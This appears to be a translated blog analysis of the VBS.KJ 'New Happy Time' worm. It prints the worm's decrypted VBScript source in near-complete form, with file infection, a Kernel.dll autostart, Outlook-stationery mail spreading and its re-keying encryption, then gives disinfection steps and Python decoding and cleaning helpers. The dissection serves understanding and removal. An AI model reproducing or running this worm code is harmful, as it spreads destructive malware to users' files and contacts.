"New Happy Time" Revisited

Category: VC

'VBS.KJ New Happy Time, a web-page macro virus
' Got infected by this virus again today, and that annoying error dialog popped up once more. If it stayed quiet I could live with it, but writing code this sloppy just to annoy people is disgusting.
' In a fit of anger I dissected it and figured it out. The virus's encryption is fairly interesting; the clumsiest part is that it throws an error message when it runs.
' My VB is beginner level (I'm more of a C person); I can manage a HELLO WORLD, so the analysis below may well contain many mistakes.
' Please bear with me.
<BODY onload="vbscript:KJ_start()">    '  the virus code starts executing here
<!--
 * This file was automatically generated by Microsoft Internet Explorer 4.0
 * using the file %THISDIRPATH%\folder.htt (if customized) or
 * %TEMPLATEDIR%\folder.htt (if not customized).
 -->
<html>
        <body scroll=no onload="Init()">
        ......
        </body>
</html>
.......
<script language=vbscript>  ' the next statement is also part of the virus
document.Write "<div style='position:absolute; left:0px; top:0px; width:0px; height:0px; z-index:28; visibility: hidden'><" & "APPLET NAME=KJ" & "_guest HEIGHT=0 WIDTH=0 code=com.ms." & "activeX.Active" & "XComponent></APPLET></div>"
</script>
<script language=vbscript>   ' the virus body hides at the very end of FOLDER.HTT, and it is encrypted; I like that
ExeString = "..."   ' the encrypted virus body (a long opaque string) is omitted here
Execute("Dim KeyArr(3),ThisText"&vbCrLf&"KeyArr(0) = 7"&vbCrLf&"KeyArr(1) = 7"&vbCrLf&"KeyArr(2) = 3"&vbCrLf&"KeyArr(3) = 8"&vbCrLf&"For i=1 To Len(ExeString)"&vbCrLf&"TempNum = Asc(Mid(ExeString,i,1))"&vbCrLf&"If TempNum = 18 Then"&vbCrLf&"TempNum = 34"&vbCrLf&"End If"&vbCrLf&"TempChar = Chr(TempNum + KeyArr(i Mod 4))"&vbCrLf&"If TempChar = Chr(28) Then"&vbCrLf&"TempChar = vbCr"&vbCrLf&"ElseIf TempChar = Chr(29) Then"&vbCrLf&"TempChar = vbLf"&vbCrLf&"End If"&vbCrLf&"ThisText = ThisText & TempChar"&vbCrLf&"Next")
Execute (ThisText)  ' run the code!
</script>
</BODY>
</HTML>
' End of virus (the decrypted body follows)
Dim InWhere, HtmlText, VbsText, DegreeSign, AppleObject, FSO, WsShell, WinPath, SubE, FinalyDisk
' Some of the variables defined; each explained here
' InWhere               whether the program is running inside HTML or has already moved on to the virus-code (VBS) part
' HtmlText              needs no explanation: the content written into HTML files
' VbsText               the VBS script text the virus needs
' DegreeSign
' AppleObject
' FSO                   all too familiar: the object scripts use to work with the file system
' WsShell               runs Windows programs
' WinPath               holds the Windows system path
' SubE
' FinalyDisk    the last hard disk; nasty, it wants to hit them all??
Sub KJ_start()  ' here we go; the overall structure is fairly clear
KJSetDim()      ' set up the variables
KJCreateMilieu()
KJLikeIt()
KJCreateMail()
KJPropagate()
End Sub
 
Function KJAppendTo(FilePath, TypeStr)
' Checks the target file (really FOLDER.HTT) and, if it has not been infected yet, appends the virus body
        On Error Resume Next
        Set ReadTemp = FSO.OpenTextFile(FilePath, 1) ' open the file for reading
        TmpStr = ReadTemp.ReadAll
        If InStr(TmpStr, "KJ_start()") <> 0 Or Len(TmpStr) < 1 Then
                ReadTemp.Close          ' if the opened file does not contain the string "KJ_start()", it has not been infected
                Exit Function           ' empty files are skipped
        End If                      ' from here on the file meets the infection conditions
        If TypeStr = "htt" Then     ' if it is an HTT file (every directory has one; show hidden files if you want to see it)
                ReadTemp.Close                  ' it was opened for reading; to write, it has to be closed and reopened for writing (my guess ^_^)
                Set FileTemp = FSO.OpenTextFile(FilePath, 2)
                FileTemp.Write "<" & "BODY onload=""" & "vbscript:" & "KJ_start()""" & ">" & vbCrLf & TmpStr & vbCrLf & HtmlText
                FileTemp.Close                  ' writes "<BODY onload="vbscript:KJ_start()">" as the first line of the HTT file, as I noted at the top of this article
                Set FAttrib = FSO.GetFile(FilePath)
                FAttrib.Attributes = 34 ' change the file attributes: hidden
        Else
                ReadTemp.Close
                Set FileTemp = FSO.OpenTextFile(FilePath, 8)
                If TypeStr = "html" Then ' for an HTML file, <BODY onload="vbscript:KJ_start()"> has to be written between <HTML></HTML> or it will not run
                        FileTemp.Write vbCrLf & "<" & "HTML>" & vbCrLf & "<" & "BODY onload=""" & "vbscript:" & "KJ_start()""" & ">" & vbCrLf & HtmlText
                ElseIf TypeStr = "vbs" Then
                        FileTemp.Write vbCrLf & VbsText
                End If
                FileTemp.Close
        End If
End Function

Function KJChangeSub(CurrentString, LastIndexChar)
' Switches directory
         If LastIndexChar = 0 Then
                If Left(LCase(CurrentString), 1) <= LCase("c") Then ' if this is the first hard disk, jump to the last one
                        KJChangeSub = FinalyDisk & ":\"
                        SubE = 0                                    ' it seems to cycle round
                Else                                                ' for other disks, decrement the drive letter (e.g. 'D'-1 = C)
                        KJChangeSub = Chr(Asc(Left(LCase(CurrentString), 1)) - 1) & ":\"
                        SubE = 0
                End If
        Else
                KJChangeSub = Mid(CurrentString, 1, LastIndexChar)
        End If
End Function

Function KJCreateMail()
' Sends e-mail through Outlook to the addresses in the address book.
        On Error Resume Next
        If InWhere = "html" Then
                Exit Function     ' skip this step when running inside HTML
        End If                            ' first infect BLANK.HTM, which IE loads when "use blank page" is the default in its settings
        ShareFile = Left(WinPath, 3) & "Program Files\Common Files\Microsoft Shared\Stationery\blank.htm"
        If (FSO.FileExists(ShareFile)) Then    ' infect it directly if it exists
                Call KJAppendTo(ShareFile, "html")
        Else                                                               ' otherwise fabricate an infected BLANK.HTM
                Set FileTemp = FSO.OpenTextFile(ShareFile, 2, True)
                FileTemp.Write "<" & "HTML>" & vbCrLf & "<" & "BODY onload=""" & "vbscript:" & "KJ_start()""" & ">" & vbCrLf & HtmlText
                FileTemp.Close
        End If
        DefaultId = WsShell.RegRead("HKEY_CURRENT_USER\Identities\Default User ID")
        OutLookVersion = WsShell.RegRead("HKEY_LOCAL_MACHINE\Software\Microsoft\Outlook Express\MediaVer")
        WsShell.RegWrite "HKEY_CURRENT_USER\Identities\"&DefaultId&"\Software\Microsoft\Outlook Express\"& Left(OutLookVersion,1) &".0\Mail\Compose Use Stationery",1,"REG_DWORD"
        Call KJMailReg("HKEY_CURRENT_USER\Identities\"&DefaultId&"\Software\Microsoft\Outlook Express\"& Left(OutLookVersion,1) &".0\Mail\Stationery Name",ShareFile)
        Call KJMailReg("HKEY_CURRENT_USER\Identities\"&DefaultId&"\Software\Microsoft\Outlook Express\"& Left(OutLookVersion,1) &".0\Mail\Wide Stationery Name",ShareFile)
        WsShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Outlook\Options\Mail\EditorPreference", 131072, "REG_DWORD"
        Call KJMailReg("HKEY_CURRENT_USER\Software\Microsoft\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings\0a0d020000000000c000000000000046\001e0360", "blank")
        Call KJMailReg("HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings\0a0d020000000000c000000000000046\001e0360", "blank")
        WsShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Outlook\Options\Mail\EditorPreference",131072,"REG_DWORD"
        Call KJMailReg("HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Common\MailSettings\NewStationery","blank")
        KJummageFolder (Left(WinPath, 3) & "Program Files\Common Files\Microsoft Shared\Stationery")
End Function

Function KJCreateMilieu()
' Checks whether the system has the script interpreter installed; if not, it uses the system files Kernel.dll / Kernel32.dll to carry out its operations,
' which fully exposes how fragile Windows is
        On Error Resume Next
        TempPath = ""
        If Not (FSO.FileExists(WinPath & "WScript.exe")) Then
                TempPath = "system32\"
        End If
        If TempPath = "system32\" Then
                StartUpFile = WinPath & "SYSTEM\Kernel32.dll"
        Else
                StartUpFile = WinPath & "SYSTEM\Kernel.dll"
        End If
        WsShell.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Kernel32", StartUpFile
        FSO.CopyFile WinPath & "web\kjwall.gif", WinPath & "web\Folder.htt"
        FSO.CopyFile WinPath & "system32\kjwall.gif", WinPath & "system32\desktop.ini"
        Call KJAppendTo(WinPath & "web\Folder.htt", "htt")
        WsShell.RegWrite "HKEY_CLASSES_ROOT\.dll\", "dllfile"
        WsShell.RegWrite "HKEY_CLASSES_ROOT\.dll\Content Type", "application/x-msdownload"
        WsShell.RegWrite "HKEY_CLASSES_ROOT\dllfile\DefaultIcon\", WsShell.RegRead("HKEY_CLASSES_ROOT\vxdfile\DefaultIcon\")
        WsShell.RegWrite "HKEY_CLASSES_ROOT\dllfile\ScriptEngine\", "VBScript"
        WsShell.RegWrite "HKEY_CLASSES_ROOT\dllFile\Shell\Open\Command\", WinPath & TempPath & "WScript.exe ""%1"" %*"
        WsShell.RegWrite "HKEY_CLASSES_ROOT\dllFile\ShellEx\PropertySheetHandlers\WSHProps\", "{60254CA5-953B-11CF-8C96-00AA00B8708C}"
        WsShell.RegWrite "HKEY_CLASSES_ROOT\dllFile\ScriptHostEncode\", "{85131631-480C-11D2-B1F9-00C04F86C324}"
        Set FileTemp = FSO.OpenTextFile(StartUpFile, 2, True)
        FileTemp.Write VbsText    ' here the virus is written into Kernel.dll / Kernel32.dll
        FileTemp.Close
End Function

Function KJLikeIt()
        If InWhere <> "html" Then
                Exit Function
        End If  ' work out the current file's path
        ThisLocation = document.location
        If Left(ThisLocation, 4) = "file" Then
                ThisLocation = Mid(ThisLocation, 9)
                If FSO.GetExtensionName(ThisLocation) <> "" Then
                        ThisLocation = Left(ThisLocation, Len(ThisLocation) - Len(FSO.GetFileName(ThisLocation)))
                End If
                If Len(ThisLocation) > 3 Then
                        ThisLocation = ThisLocation & "\"
                End If
                KJummageFolder (ThisLocation)
        End If
End Function

Function KJMailReg(RegStr, FileName)
        On Error Resume Next
        RegTempStr = WsShell.RegRead(RegStr)
        If RegTempStr = "" Then
                WsShell.RegWrite RegStr, FileName
        End If
End Function

Function KJOboSub(CurrentString)
' Works out how deeply the current path is nested
        SubE = 0
        TestOut = 0
        Do While True
                TestOut = TestOut + 1
                If TestOut > 28 Then   ' if the depth exceeds 28, return to the root of the last hard disk
                        CurrentString = FinalyDisk & ":\"
                        Exit Do
                End If
                On Error Resume Next
                Set ThisFolder = FSO.GetFolder(CurrentString)    ' current directory string
                Set DicSub = CreateObject("Scripting.Dictionary") ' build a dictionary to hold directories and depth
                Set Folders = ThisFolder.SubFolders                     ' get the subfolders
                FolderCount = 0                                                                 ' subfolder count starts at zero
                For Each TempFolder In Folders                                  ' count the subfolders
                        FolderCount = FolderCount + 1
                        DicSub.Add FolderCount, TempFolder.Name
                Next
                If DicSub.Count = 0 Then                                                ' if there are no subfolders
                        LastIndexChar = InStrRev(CurrentString, "\", Len(CurrentString) - 1) ' find the last '\' in the path
                        SubString = Mid(CurrentString, LastIndexChar + 1, Len(CurrentString) - LastIndexChar - 1) ' the deepest subfolder
                        CurrentString = KJChangeSub(CurrentString, LastIndexChar) ' switch to the parent directory
                        SubE = 1
                Else
                        If SubE = 0 Then
                                CurrentString = CurrentString & DicSub.Item(1) & "\"   ' walk the subfolders stored in the dictionary
                                Exit Do
                        Else
                                 j = 0
                                 For j = 1 To FolderCount
                                 If LCase(SubString) = LCase(DicSub.Item(j)) Then
                                        If j < FolderCount Then   ' descend into the subfolder
                                                CurrentString = CurrentString & DicSub.Item(j + 1) & "\"
                                                Exit Do
                                         End If
                                  End If
                                  Next
                                  LastIndexChar = InStrRev(CurrentString, "\", Len(CurrentString) - 1)
                                  SubString = Mid(CurrentString, LastIndexChar + 1, Len(CurrentString) - LastIndexChar - 1)
                                  CurrentString = KJChangeSub(CurrentString, LastIndexChar) ' switch to the directory above
                        End If
                End If
        Loop
        KJOboSub = CurrentString
End Function

Function KJPropagate()
        On Error Resume Next
        RegPathValue = "HKEY_LOCAL_MACHINE\Software\Microsoft\Outlook Express\Degree"
        DiskDegree = WsShell.RegRead(RegPathValue)
        If DiskDegree = "" Then
                DiskDegree = FinalyDisk & ":\"
        End If
        For i = 1 To 5  ' infect the files under each directory level
                DiskDegree = KJOboSub(DiskDegree)
                KJummageFolder (DiskDegree)
        Next
        WsShell.RegWrite RegPathValue, DiskDegree  ' write the registry, recording the deepest directory reached
End Function

Function KJummageFolder(PathName)
        On Error Resume Next
        Set FolderName = FSO.GetFolder(PathName)
        Set ThisFiles = FolderName.Files
        HttExists = 0
        For Each ThisFile In ThisFiles
                FileExt = UCase(FSO.GetExtensionName(ThisFile.Path))
                If FileExt = "HTM" Or FileExt = "HTML" Or FileExt = "ASP" Or FileExt = "PHP" Or FileExt = "JSP" Then
                        Call KJAppendTo(ThisFile.Path, "html") ' infect every HTM, HTML, ASP, PHP and JSP file in the current directory
                Else
                        If FileExt = "VBS" Then     ' infect VBS files; this kind of infection is the easiest
                                Call KJAppendTo(ThisFile.Path, "vbs")
                        Else If FileExt = "HTT" Then ' an HTT file exists
                                        HttExists = 1
                End If
        Next
                If (UCase(PathName) = UCase(WinPath & "Desktop\")) Or (UCase(PathName) = UCase(WinPath & "Desktop")) Then
                        HttExists = 1     ' the Desktop, and directories on it, are not spared either
                End If
                If HttExists = 0 Then ' if no HTT file exists, fabricate one (it comes as a matched pair of two files)
                        FSO.CopyFile WinPath & "system32\desktop.ini", PathName
                        FSO.CopyFile WinPath & "web\Folder.htt", PathName
                End If
End Function

Function KJSetDim()
        On Error Resume Next
        Err.Clear
        TestIt = WScript.ScriptFullname         ' get the script file's full name
        If Err Then
                InWhere = "html"                                ' it is an HTML file
        Else
                InWhere = "vbs"                                 ' it is a VBS file
        End If
        If InWhere = "vbs" Then                         ' much easier if Script Host is installed
                Set FSO = CreateObject("Scripting.FileSystemObject")
                Set WsShell = CreateObject("WScript.Shell")
        Else                                                            ' if Script Host was not chosen at install time, the virus configures it itself; apparently Windows did not do what the user asked
                Set AppleObject = document.applets("KJ_guest") ' register a script interpreter with the system through KJ_guest
                AppleObject.setCLSID ("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}") 'Windows Scripting Host Shell Object
                AppleObject.createInstance()                                                               ' use Script Host to carry out its operations; this is why people are urged not to install Script Host when setting up 98
                Set WsShell = AppleObject.GetObject()
                AppleObject.setCLSID ("{0D43FE01-F093-11CF-8940-00A0C9054228}") ' the powerful FileSystem Object
                AppleObject.createInstance()
                Set FSO = AppleObject.GetObject()
        End If
        Set DiskObject = FSO.Drives                                                                             ' get the system's hard disks and floppy drives
        For Each DiskTemp In DiskObject
                If DiskTemp.DriveType <> 2 And DiskTemp.DriveType <> 1 Then
                        Exit For                                                                                                        ' anything that is not a hard disk or floppy cannot be infected
                End If
                FinalyDisk = DiskTemp.DriveLetter                                                               ' the last hard-disk drive letter in the system
        Next
        Dim OtherArr(3)                                                                                                         ' a random array
        Randomize
        For i = 0 To 3
                OtherArr(i) = Int((9 * Rnd))                                                                    ' from 0 to 9
        Next
        TempString = ""
        For i = 1 To Len(ThisText)                              ' from 1 to the length of the virus body; what follows looks like the virus's decryption part
                TempNum = Asc(Mid(ThisText, i, 1))              ' take the ASCII value of the character at position i
                If TempNum = 13 Then                            ' if it is 13
                        TempNum = 28                            ' force it to 28
                ElseIf TempNum = 10 Then                        ' if it is 10
                        TempNum = 29                            ' force it to 29
                End If
                TempChar = Chr(TempNum - OtherArr(i Mod 4))     ' ASCII value at position i minus OtherArr(i Mod 4)
                If TempChar = Chr(34) Then                      ' if it equals 34, replace it with 18
                        TempChar = Chr(18)
                End If
                TempString = TempString & TempChar    ' the disguised virus-code string is now built, completely randomized
        Next  ' the next statement is a bit tedious
        UnLockStr = "Execute(""Dim KeyArr(3),ThisText""&vbCrLf&""KeyArr(0) = " & OtherArr(0) & """&vbCrLf&""KeyArr(1) = " & OtherArr(1) & """&vbCrLf&""KeyArr(2) = " & OtherArr(2) & """&vbCrLf&""KeyArr(3) = " & OtherArr(3) & """&vbCrLf&""For i=1 To Len(ExeString)""&vbCrLf&""TempNum = Asc(Mid(ExeString,i,1))""&vbCrLf&""If TempNum = 18 Then""&vbCrLf&""TempNum = 34""&vbCrLf&""End If""&vbCrLf&""TempChar = Chr(TempNum + KeyArr(i Mod 4))""&vbCrLf&""If TempChar = Chr(28) Then""&vbCrLf&""TempChar = vbCr""&vbCrLf&""ElseIf TempChar = Chr(29) Then""&vbCrLf&""TempChar = vbLf""&vbCrLf&""End If""&vbCrLf&""ThisText = ThisText & TempChar""&vbCrLf&""Next"")" & vbCrLf & "Execute(ThisText)"
        ThisText = "ExeString = """ & TempString & """"
        HtmlText = "<" & "script language=vbscript>" & vbCrLf & "document.write " & """" & "<" & "div style='position:absolute; left:0px; top:0px; width:0px; height:0px; z-index:28; visibility: hidden'>" & "<""&""" & "APPLET NAME=KJ""&""_guest HEIGHT=0 WIDTH=0 code=com.ms.""&""activeX.Active""&""XComponent>" & "<" & "/APPLET>" & "<" & "/div>""" & vbCrLf & "<" & "/script>" & vbCrLf & "<" & "script language=vbscript>" & vbCrLf & ThisText & vbCrLf & UnLockStr & vbCrLf & "<" & "/script>" & vbCrLf & "<" & "/BODY>" & vbCrLf & "<" & "/HTML>"
        VbsText = ThisText & vbCrLf & UnLockStr & vbCrLf & "KJ_start()"
        'UnLockStr is the string that runs the virus; below is what actually gets executed
        '
        'Dim KeyArr(3),ThisText
        'KeyArr(0) = OtherArr(0)
        'KeyArr(1) = OtherArr(1)
        'KeyArr(2) = OtherArr(2)
        'KeyArr(3) = OtherArr(3)
        'For i=1 To Len(ExeString)
        '       TempNum = Asc(Mid(ExeString,i,1))
        '       If TempNum = 18 Then
        '               TempNum = 34
        '       End If
        '       TempChar = Chr(TempNum + KeyArr(i Mod 4))
        '       If TempChar = Chr(28) Then
        '               TempChar = vbCr
        '       ElseIf TempChar = Chr(29) Then
        '               TempChar = vbLf
        '       End If
        '       ThisText = ThisText & TempChar
        'Next     after the above runs, a ThisText command string has been built
        '       "Execute(ThisText)   "   is a string; it can be found in the web page
        '       ThisText = "ExeString = <contents of TempString>"; this is where ThisText is assigned
        '       HtmlText =
        '                       <script language=vbscript>
        '                               <div style='position:absolute; left:0px; top:0px; width:0px; height:0px; z-index:28; visibility: hidden'>
        '                                       <APPLET NAME=KJ_guest HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent>
        '                                       </APPLET>
        '                               </div>
        '                       </script>
        '                       <script language=vbscript>
        '                               ThisText     the part found in the web page, i.e. "ExeString=..."
        '                               UnLockStr       Execute("Dim KeyArr(3)...."
        '                       </script>
        '                       </BODY>
        '                       </HTML>
        'VbsText = ThisText & vbCrLf & UnLockStr & vbCrLf & "KJ_start()"
        WinPath = FSO.GetSpecialFolder(0) & "\"
        If (FSO.FileExists(WinPath & "web\Folder.htt")) Then    ' deeper-level infection
                FSO.CopyFile WinPath & "web\Folder.htt", WinPath & "web\kjwall.gif"
        End If                          ' if this machine is a web server, every user who browses it will be infected
        If (FSO.FileExists(WinPath & "system32\desktop.ini")) Then
                FSO.CopyFile WinPath & "system32\desktop.ini", WinPath & "system32\kjwall.gif"
        End If
End Function
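The re-keying loop in KJSetDim() above and the Execute() decoder embedded in the infected page are one 4-byte add/subtract scheme with two substitutions (CR/LF become 28/29, a double quote becomes chr(18)). The following Python helper is an added example, my code rather than the worm's or the author's: it reads the four KeyArr values and the ExeString literal straight out of an infected page and decodes the body without executing any script. kj_encode is the forward transform and is only used to construct the sample; the sample page is constructed, not a real infection.

```python
import re
from typing import List, Optional


def kj_decode(exe_string: str, keys: List[int]) -> str:
    """Inverse of the worm's re-keying: what the embedded Execute() decoder does.

    keys holds KeyArr(0..3). VBScript's loop counts from 1, so the character at
    1-based position i is shifted by keys[i % 4].
    """
    out = []
    for i, ch in enumerate(exe_string, start=1):
        n = ord(ch)
        if n == 18:            # the encoder stored every double quote as chr(18)
            n = 34
        c = chr(n + keys[i % 4])
        if c == chr(28):       # CR was mapped to 28 before keying
            c = "\r"
        elif c == chr(29):     # LF was mapped to 29 before keying
            c = "\n"
        out.append(c)
    return "".join(out)


def kj_encode(plain: str, keys: List[int]) -> str:
    """Forward transform from KJSetDim(); included only to build the test sample.

    Assumes printable/whitespace ASCII input and keys in 0..8, as the worm has.
    """
    out = []
    for i, ch in enumerate(plain, start=1):
        n = ord(ch)
        if n == 13:
            n = 28
        elif n == 10:
            n = 29
        c = chr(n - keys[i % 4])
        if c == '"':           # a quote would break the ExeString = "..." literal
            c = chr(18)
        out.append(c)
    return "".join(out)


# The decoder stub written into each victim carries its keys in clear text, e.g.
#   "KeyArr(0) = 7"&vbCrLf&"KeyArr(1) = 7"&...   (values differ per infection)
KEY_RE = re.compile(r"KeyArr\((\d)\) = (\d+)")
BODY_RE = re.compile(r'ExeString = "([^"]*)"')


def extract_keys(page: str) -> Optional[List[int]]:
    found = {int(idx): int(val) for idx, val in KEY_RE.findall(page)}
    if sorted(found) != [0, 1, 2, 3]:
        return None
    return [found[i] for i in range(4)]


def extract_body(page: str) -> Optional[str]:
    """Return the decoded virus body from an infected page, or None if absent."""
    keys = extract_keys(page)
    m = BODY_RE.search(page)
    if keys is None or m is None:
        return None
    return kj_decode(m.group(1), keys)


# Constructed sample (not a real infection): a short stand-in body re-keyed with
# the same KeyArr values that the page's own decoder stub shows (7, 7, 3, 8).
SAMPLE_KEYS = [7, 7, 3, 8]
SAMPLE_BODY = 'Dim InWhere\r\nSub KJ_start()\r\n\tMsgBox "sample"\r\nEnd Sub'
SAMPLE_PAGE = (
    "<script language=vbscript>\r\n"
    'ExeString = "' + kj_encode(SAMPLE_BODY, SAMPLE_KEYS) + '"\r\n'
    'Execute("Dim KeyArr(3),ThisText"&vbCrLf&"KeyArr(0) = 7"&vbCrLf&"KeyArr(1) = 7"'
    '&vbCrLf&"KeyArr(2) = 3"&vbCrLf&"KeyArr(3) = 8"&vbCrLf&"Next")\r\n'
    "Execute (ThisText)\r\n</script>"
)

if __name__ == "__main__":
    print(extract_body(SAMPLE_PAGE))
```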

' With the analysis above, disinfection is much easier
' Disinfection steps
' 1. For HTT files
'       the first line is the start of the virus and should be deleted: the first 0x24 bytes should be removed
'       counting back from the end of the file, (0x5A0A-0x2D3C+1=) 0x2CCF bytes should be removed
' 2. For HTML, ASP, PHP and JSP files
'   counting back from the end of the file, (0x5E4E-0x3153+1=) 0x2CFC bytes should be removed
' 3. For VBS files
'   just delete the last 0x2B97+2 (CRLF) bytes of the file
' 4. KERNEL.DLL can simply be deleted; to be safe, you can also delete the last 0x2B97 bytes of the file
' 5. kjwall.gif too: just delete it.
' 6. The modified registry entries must be restored
'       WsShell.RegWrite "HKEY_CURRENT_USER\Identities\"&DefaultId&"\Software\Microsoft\Outlook Express\"& Left(OutLookVersion,1) &".0\Mail\Compose Use Stationery",1,"REG_DWORD"
'       Call KJMailReg("HKEY_CURRENT_USER\Identities\"&DefaultId&"\Software\Microsoft\Outlook Express\"& Left(OutLookVersion,1) &".0\Mail\Stationery Name",ShareFile)
'       Call KJMailReg("HKEY_CURRENT_USER\Identities\"&DefaultId&"\Software\Microsoft\Outlook Express\"& Left(OutLookVersion,1) &".0\Mail\Wide Stationery Name",ShareFile)
'       WsShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Outlook\Options\Mail\EditorPreference",131072,"REG_DWORD"
'       Call KJMailReg("HKEY_CURRENT_USER\Software\Microsoft\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings\0a0d020000000000c000000000000046\001e0360","blank")
'       Call KJMailReg("HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings\0a0d020000000000c000000000000046\001e0360","blank")
'       WsShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Outlook\Options\Mail\EditorPreference",131072,"REG_DWORD"
'       Call KJMailReg("HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Common\MailSettings\NewStationery","blank")
'       WsShell.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Kernel32",StartUpFile
'       WsShell.RegWrite "HKEY_CLASSES_ROOT\dllfile\DefaultIcon\",WsShell.RegRead("HKEY_CLASSES_ROOT\vxdfile\DefaultIcon\")
'       WsShell.RegWrite "HKEY_CLASSES_ROOT\dllFile\Shell\Open\Command\",WinPath & TempPath & "WScript.exe ""%1"" %*"
'       WsShell.RegWrite "HKEY_CLASSES_ROOT\dllFile\ShellEx\PropertySheetHandlers\WSHProps\","{60254CA5-953B-11CF-8C96-00AA00B8708C}"
'       WsShell.RegWrite "HKEY_CLASSES_ROOT\dllFile\ScriptHostEncode\","{85131631-480C-11D2-B1F9-00C04F86C324}"
'       RegPathValue = "HKEY_LOCAL_MACHINE\Software\Microsoft\Outlook Express\Degree"
' ****************************************************************
'       HKEY_CURRENT_USER\Identities\Default User ID   if there is a SOFTWARE\... subtree under it, delete that SOFTWARE part and keep the rest
'       HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Outlook\Options\Mail\EditorPreference   clear the value
'       HKEY_CURRENT_USER\Software\Microsoft\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings\0a0d020000000000c000000000000046\001e0360    clear
'       HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings\0a0d020000000000c000000000000046\001e0360   clear
'       HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Outlook\Options\Mail\EditorPreference  clear
'       HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Common\MailSettings\NewStationery     clear
'       HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Kernel32                       clear
'       HKEY_CLASSES_ROOT\.dll                          delete .DLL and everything under it
'       HKEY_CLASSES_ROOT\dllfile\DefaultIcon\                  delete DLLFILE and everything under it
'       HKEY_CLASSES_ROOT\dllFile\Shell\Open\Command
'       HKEY_CLASSES_ROOT\dllFile\ShellEx\PropertySheetHandlers\WSHProps
'       HKEY_CLASSES_ROOT\dllFile\ScriptHostEncode
'       HKEY_LOCAL_MACHINE\Software\Microsoft\Outlook Express\Degree            delete DEGREE and everything under it
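The byte counts in steps 1 to 4 hold only for the exact sample the author measured, because the re-keyed blob length varies per infection. Since KJAppendTo() always writes the same markers (the BODY hook line, the two vbscript blocks, the ExeString line), a cleaner can cut at the markers instead; this added Python example (my code, not the author's) generalizes steps 1 to 4 that way for the three TypeStr cases. The sample file contents are constructed with a placeholder in place of the blob.

```python
from typing import Optional, Tuple

# Markers KJAppendTo() / KJSetDim() write into every victim file; matching is done
# on lower-cased text because the worm mixes <BODY>/<body> and Write/write.
BODY_HOOK = '<body onload="vbscript:kj_start()">'   # first line of an HTT, tail of an HTML
SCRIPT_OPEN = "<script language=vbscript>"           # HtmlText opens with this tag
BLOB_MARK = 'exestring = "'                          # ThisText: the re-keyed body
CRLF = "\r\n"


def kind_for(filename: str) -> Optional[str]:
    """Map a file name to the TypeStr that KJAppendTo() would have used, or None."""
    ext = filename.rsplit(".", 1)[-1].upper() if "." in filename else ""
    if ext in ("HTM", "HTML", "ASP", "PHP", "JSP"):
        return "html"
    if ext == "VBS":
        return "vbs"
    if ext == "HTT":
        return "htt"
    return None


def is_infected(text: str) -> bool:
    low = text.lower()
    return "kj_start()" in low and BLOB_MARK in low


def disinfect(text: str, kind: str) -> Tuple[str, bool]:
    """Cut the KJ payload off a file; returns (cleaned_text, changed).

    An empty cleaned_text means the whole file was worm-made (a fabricated
    blank.htm, or SYSTEM\\Kernel.dll) and can simply be deleted.
    """
    if not is_infected(text):
        return text, False
    low = text.lower()
    blob = low.find(BLOB_MARK)
    if kind == "vbs":
        cleaned = text[:blob]          # VbsText starts with the ExeString line
    else:
        # HtmlText = applet <script> block + decoder <script> block, and the blob
        # is in the second one: back up two tags and check the applet block is there.
        s2 = low.rfind(SCRIPT_OPEN, 0, blob)
        s1 = low.rfind(SCRIPT_OPEN, 0, s2) if s2 >= 0 else -1
        if s1 < 0 or "activex" not in low[s1:s2]:
            return text, False
        cleaned = text[:s1]
        hook = "<html>" + CRLF + BODY_HOOK + CRLF
        if cleaned.lower() == hook:
            return "", True            # fabricated file: nothing original to keep
        if kind == "html" and cleaned.lower().endswith(CRLF + hook):
            return cleaned[:-(len(hook) + len(CRLF))], True
        if kind == "htt" and cleaned.lower().startswith(BODY_HOOK + CRLF):
            cleaned = cleaned[len(BODY_HOOK) + len(CRLF):]
    if cleaned.endswith(CRLF):         # the CRLF KJAppendTo() put before the payload
        cleaned = cleaned[:-len(CRLF)]
    return cleaned, True


def disinfect_file(path: str) -> bool:
    """Clean one file in place (byte-preserving via latin-1); True if it changed."""
    kind = kind_for(path)
    if kind is None:
        return False
    with open(path, "rb") as fh:
        cleaned, changed = disinfect(fh.read().decode("latin-1"), kind)
    if changed:
        with open(path, "wb") as fh:
            fh.write(cleaned.encode("latin-1"))
    return changed


# Constructed stand-ins for HtmlText / VbsText, laid out like the infected page at
# the top of this article but with a placeholder where the encrypted blob would be.
FAKE_HTMLTEXT = CRLF.join([
    "<script language=vbscript>",
    "document.Write \"<div style='visibility: hidden'><\" & \"APPLET NAME=KJ\" & "
    "\"_guest HEIGHT=0 WIDTH=0 code=com.ms.\" & \"activeX.Active\" & "
    "\"XComponent></APPLET></div>\"",
    "</script>",
    "<script language=vbscript>",
    'ExeString = "CONSTRUCTED-PLACEHOLDER-NOT-A-REAL-BLOB"',
    'Execute("Dim KeyArr(3),ThisText"&vbCrLf&"KeyArr(0) = 1")',
    "Execute (ThisText)",
    "</script>", "</BODY>", "</HTML>",
])
FAKE_VBSTEXT = CRLF.join([
    'ExeString = "CONSTRUCTED-PLACEHOLDER-NOT-A-REAL-BLOB"',
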